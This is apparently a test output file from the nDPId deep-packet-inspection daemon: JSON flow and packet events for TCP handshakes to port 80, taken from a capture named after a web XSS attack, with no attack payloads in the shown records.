-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348073365,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348073365,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pg1AAD4Gh8OsEAABwKgKMotiAFCjeCG\/AAAAAKACchDtKgAAAgQFtAQCCAoBPR+yAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":2,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi2IT1M33o3ghwKAScSAXMQAAAgQFtAQCCAoD5vEmAT0fsgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9164,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":3,"flow_last_seen":1499348073366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348073366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Pg5AAD4Gh8qsEAABwKgKMotiAFCjeCHAE9TN+IAQAOW2NwAAAQEICgE9H7MD5vEm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348074670,"flow_last_seen":1499348074670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348074670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1499348074670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OC5AAD4GjaKsEAABwKgKMotwAFDSMxjXAAAAAKACchDGAgAAAgQFtAQCCAoBPSD5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":2,"flow_last_seen":1499348074670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi3D0f4w30jMY2KAScSBP1gAAAgQFtAQCCAoD5vJtAT0g+QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":3,"flow_last_seen":1499348074671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348074671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OC9AAD4GjamsEAABwKgKMotwAFDSMxjY9H+MOIAQAOXu3QAAAQEICgE9IPkD5vJt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348077218,"flow_last_seen":1499348077218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348077218,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1499348077218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HtAAD4G9VSsEAABwKgKMouKAFBc0\/MNAAAAAKACchBelQAAAgQFtAQCCAoBPSN2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":2,"flow_last_seen":1499348077218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi4oOSV5eXNPzDqAScSD5+wAAAgQFtAQCCAoD5vTqAT0jdgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":3,"flow_last_seen":1499348077219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348077219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HxAAD4G9VusEAABwKgKMouKAFBc0\/MODkleX4AQAOWZAwAAAQEICgE9I3YD5vTq"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348078531,"flow_last_seen":1499348078531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348078531,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1499348078531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078531,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86yNAAD4G2qysEAABwKgKMouYAFAizM+dAAAAAKACchC6tgAAAgQFtAQCCAoBPSS+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9205,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":2,"flow_last_seen":1499348078532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078532,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi5glYndPIszPnqAScSAkywAAAgQFtAQCCAoD5vYyAT0kvgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":3,"flow_last_seen":1499348078532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348078532,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yRAAD4G2rOsEAABwKgKMouYAFAizM+eJWJ3UIAQAOXD0gAAAQEICgE9JL4D5vYy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348081113,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P1ZAAD4GhnqsEAABwKgKMouyAFAGWhgVAAAAAKACchCMEgAAAgQFtAQCCAoBPSdDAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9226,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":2,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi7IGSc2TBloYFqAScSC8dgAAAgQFtAQCCAoD5vi3AT0nQwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9227,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":3,"flow_last_seen":1499348081114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348081114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P1dAAD4GhoGsEAABwKgKMouyAFAGWhgWBknNlIAQAOVbfQAAAQEICgE9J0QD5vi3"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348082422,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348082422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EzVAAD4GspusEAABwKgKMovAAFDEhDu+AAAAAKACchCo6AAAAgQFtAQCCAoBPSiLAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":2,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi8Dw+8kBxIQ7v6AScSDx4wAAAgQFtAQCCAoD5vn\/AT0oiwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":3,"flow_last_seen":1499348082423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348082423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EzZAAD4GsqKsEAABwKgKMovAAFDEhDu\/8PvJAoAQAOWQ6wAAAQEICgE9KIsD5vn\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348083715,"flow_last_seen":1499348083715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348083715,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1499348083715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aIdAAD4GXUmsEAABwKgKMovOAFCsxEFJAAAAAKACchC5zAAAAgQFtAQCCAoBPSnOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":2,"flow_last_seen":1499348083716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi847RWyhrMRBSqAScSATnAAAAgQFtAQCCAoD5vtCAT0pzgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":3,"flow_last_seen":1499348083716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348083716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aIhAAD4GXVCsEAABwKgKMovOAFCsxEFKO0VsooAQAOWyowAAAQEICgE9Kc4D5vtC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348086300,"flow_last_seen":1499348086300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348086300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1499348086300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GytAAD4GqqWsEAABwKgKMovoAFCxvjd\/AAAAAKACchC7\/AAAAgQFtAQCCAoBPSxUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":2,"flow_last_seen":1499348086300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi+jtWBzhsb43gKAScSCw8gAAAgQFtAQCCAoD5v3IAT0sVAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":3,"flow_last_seen":1499348086301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348086301,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GyxAAD4GqqysEAABwKgKMovoAFCxvjeA7Vgc4oAQAOVP+gAAAQEICgE9LFQD5v3I"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348087568,"flow_last_seen":1499348087568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348087568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1499348087568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WltAAD4Ga3WsEAABwKgKMov2AFAj3nfKAAAAAKACchAIRwAAAgQFtAQCCAoBPS2RAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":2,"flow_last_seen":1499348087568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi\/boFFliI953y6AScSDEwgAAAgQFtAQCCAoD5v8FAT0tkQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":3,"flow_last_seen":1499348087569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348087569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WlxAAD4Ga3ysEAABwKgKMov2AFAj3nfL6BRZY4AQAOVjygAAAQEICgE9LZED5v8F"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348090129,"flow_last_seen":1499348090129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348090129,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 